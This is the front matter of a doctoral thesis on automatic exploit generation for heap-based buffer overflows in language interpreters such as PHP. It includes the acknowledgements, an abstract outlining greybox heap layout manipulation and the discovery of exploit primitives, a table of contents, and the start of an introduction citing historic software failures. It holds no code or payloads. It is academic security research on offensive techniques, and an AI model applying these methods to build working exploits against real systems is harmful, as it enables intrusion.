Greybox Automatic Exploit Generation for Heap Overflows in Language

Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters Sean Heelan Balliol College University of Oxford A thesis submitted for the degree of Doctor of Philosophy Hilary 2020 Acknowledgements First and foremost, I would like to thank my supervisors, Prof. Tom Melham and Prof. Daniel Kroening, for their invaluable support and assistance during my research. I am grateful for the guidance they provided, but also for the freedom they gave me to pursue my scientific interests. I would like to thank my colleagues in the research group for their insights and discussions over the past few years, especially John Galea, Martin Nyx Brain and Youcheng Sun. I am also thankful to Prof. Kasper Rasmussen, Prof. Cas Cramers and Prof. Alex Rogers who took part in my various internal examinations. I am indebted to Thomas Dullien for hours of discussion on the topic of exploit generation and, equally importantly, for never needing much convincing to go surfing. The papers I have written during my DPhil have benefited from reviews and input from a number of people, both inside and outside of academia. I am eternally grateful to the anonymous reviewers from the USENIX Security, ACM CCS, and IEEE S&P conferences, as well as Dave Aitel, Bas Alberts, Rodrigo Branco, and Mara Tam, for their detailed feedback and assistance in improving my work. On a personal note, I would like to thank my parents, John and Bernadette, for their continued support, without which I wouldn’t have even started a DPhil, let alone finished one. To the good friends I made during my time in Oxford, and in particular Rolf, Emma, Dan, Anna, Sara and Roman, I would like to say thank you for the conversations, dinners, late nights, early mornings, and everything else that made my time here memorable. Finally, I would like to thank the Department of Computer Science in Oxford, as well as Balliol College, for hosting me over the past few years and providing an intellectually stimulating and enjoyable environment. Abstract This dissertation addresses the problem of automatic exploit generation for heap- based buffer overflows in language interpreters. Language interpreters are ubiquitous within modern software, embedded in everything from web browsers, to anti-virus engines, to cloud computing platforms, and, within interpreters, heap-based buffer overflows are a common source of vulnerability. Automatic exploit generation for such vulnerabilities is a largely open problem. In the past decade, greybox methods that combine large scale input generation with feedback from instrumentation have proven themselves to be the most successful approach to detecting many types of software vulnerabilities. Despite this, prior to the start of my research they had not been a significant component of exploit generation systems. Greybox approaches are attractive as they tend to scale far better than whitebox approaches when applied to large software. However, end-to- end exploit generation is too complex and multi-faceted a task to approach with a single greybox solution. During my research I have analysed the exploit generation problem for heap-based overflows in language interpreters in order to break it down into a set of logical sub-problems that can be addressed with separate greybox solutions. In this dissertation I present these sub-problems, greybox algorithms for each, and demonstrate how the solutions for the sub-problems can be combined to generate an exploit. The most significant of the sub-problems that I address is the heap layout problem, for which I provide a detailed analysis, two different greybox solutions, and methods for integrating solutions to this problem into both manual and automatic exploit generation. The presented algorithms form the first approach to automatic exploit generation for heap overflows in interpreters. They also provide the first approach to exploit generation in any class of program that integrates a solution for automatic heap layout manipulation. At the core of the approach is a novel method for discovering exploit primitives—inputs to the target program that result in a sensitive operation, such as a function call or a memory write, using attacker-injected data. To produce an exploit primitive from a heap overflow vulnerability, one has to discover a target data structure to corrupt, ensure an instance of that data structure is adjacent to the source of the overflow on the heap, and ensure that the post-overflow corrupted data is used in a manner desired by the attacker. I present solutions to address these three tasks in an automatic, greybox, and modular manner. Contents List of Abbreviations xi 1 Introduction 1 1.1 Motivation . .1 1.2 Problem Definition . .4 1.3 Contributions . .5 2 Background 7 2.1 General Background Material . .7 2.1.1 Exploitation of Heap-based Overflows . .7 2.1.2 Symbolic Execution and Language Interpreters . 12 2.1.3 Greybox Program Analysis . 15 2.2 Literature Review . 16 2.2.1 AEG for Stack-Based Overflows . 17 2.2.2 AEG for Heap-based Overflows . 17 2.2.3 Assisting Exploit Development and Payload Generation . 18 2.2.4 Data-Only Attacks . 18 2.2.5 Theory of Exploitation . 19 2.2.6 Manual Exploit Development . 19 3 A Greybox Approach to the Heap Layout Problem 21 3.1 Introduction . 21 3.1.1 An Example . 22 3.2 Heap Allocator Mechanisms . 25 3.2.1 Relevant Allocator Policies and Mechanisms . 26 3.2.2 Allocators . 30 3.3 The Heap Layout Manipulation Problem in Deterministic Settings . 31 3.3.1 Problem Restrictions for a Deterministic Setting . 32 3.3.2 Heap Layout Manipulation Primitives . 33 3.3.3 Challenges . 37 3.4 Automatic Heap Layout Manipulation . 39 3.4.1 SIEVE: An Evaluation Framework for HLM Algorithms . 40 vii viii Contents 3.4.2 SHRIKE: A HLM System for PHP . 42 3.5 Experiments and Evaluation . 48 3.5.1 Synthetic Benchmarks . 49 3.5.2 PHP-Based Benchmarks . 53 3.5.3 Generating a Control-Flow Hijacking Exploit for PHP . 54 3.5.4 Research Questions . 55 3.5.5 Generalisability . 56 3.5.6 Threats to Validity . 57 4 A Genetic Algorithm for the Heap Layout Problem 59 4.1 Introduction . 59 4.2 Genetic Algorithm . 60 4.2.1 Target-Agnostic Operation . 62 4.2.2 Individual Representation . 63 4.2.3 Population Initialisation . 66 4.2.4 Genetic Operators . 66 4.2.5 Evaluation and Fitness . 67 4.2.6 Selection . 69 4.2.7 Implementation . 70 4.3 Experiments . 70 4.3.1 Research Questions . 70 4.4 Analysis and Discussion . 71 4.4.1 The Success Rate of EvoHeap on Synthetic Benchmarks . 71 4.4.2 The Success Rate of EvoHeap on PHP Benchmarks . 74 4.4.3 The Speed of EvoHeap on Synthetic Benchmarks . 74 4.4.4 The Speed of EvoHeap on PHP Benchmarks . 76 4.4.5 Answers to Research Questions . 77 5 A Greybox Approach to Automatic Exploit Generation 79 5.1 Introduction . 79 5.1.1 Model, Assumptions and Practical Applicability . 81 5.2 System Overview and Motivating Example . 82 5.3 Primitive Discovery . 86 5.3.1 Vulnerability Importing . 87 5.3.2 Test Preprocessing . 87 5.3.3 New Input Generation . 88 5.3.4 Heap Layout Exploration . 89 5.3.5 Primitive Categorisation and Dynamically Discovering I/O Relationships . 91 5.4 Exploit Generation . 93 Contents ix 5.4.1 Primitive Transformers . 93 5.5 Solving the Heap Layout Problem . 97 5.5.1 Automatic Injection of SHRIKE Directives . 98 5.6 Exploit Generation Walk-through . 99 5.7 Evaluation . 106 5.7.1 Implementation . 106 5.7.2 Exploitation . 107 5.8 Assisted Exploit Generation . 111 5.9 Generalisability and Threats to Validity . 114 6 Conclusion 115 6.1 Future Work . 116 6.1.1 Greybox AEG . 116 6.1.2 Heap Layout Manipulation . 118 6.1.3 General AEG . 119 Appendices References 127 x List of Abbreviations AEG ...... Automatic Exploit Generation CFI ...... Control-Flow Integrity GA ....... Genetic Algorithm HLP ...... Heap Layout Problem HLM ...... Heap Layout Manipulation KLoC ..... Kilo-Lines of Code LoC ...... Lines of Code OOB ...... Out Of Bounds ROP ...... Return-Oriented Programming xi xii Failure is central to engineering. Every single calculation that an engineer makes is a failure calculation. Successful engineering is all about understanding how things break or fail. — Henry Petroski 1 Introduction 1.1 Motivation The phrase “Software is Eating the World” refers to the phenomenon by which many of the most successful companies across diverse industries are now essentially software companies [1]. Whether in entertainment, finance, retail, marketing, communications, or a host of other areas, software provides the core value of a significant number of the world’s companies. And, while software eats the world, bugs and vulnerabilities are eating software. There is by now a long list of famous software bugs that have caused death, destruction, disruption and massive financial loss. To point out just a few incidents: 1. June 3rd 1985, a software flaw causes a Therac-25 radiation therapy machine to deliver a massive dose of radiation to a patient, severely injuring them. The same flaw would later cause the deaths of three other patients, and injure others [2]. 2. February 5th 1991, an arithmetic error causes an American Patriot Missile battery to fail to track and destroy an incoming missile, resulting in the deaths of 28 American soldiers [3, 4] 3. June 4th 1994, the first Ariane 5 rocket explodes shortly after launch due to an error in its representation of floating point numbers [5]. 4. August 14th 2003, a race condition causes an error monitoring system to malfunction, eventually resulting in a power blackout to 55 million people across the American Northeast [6].

Load more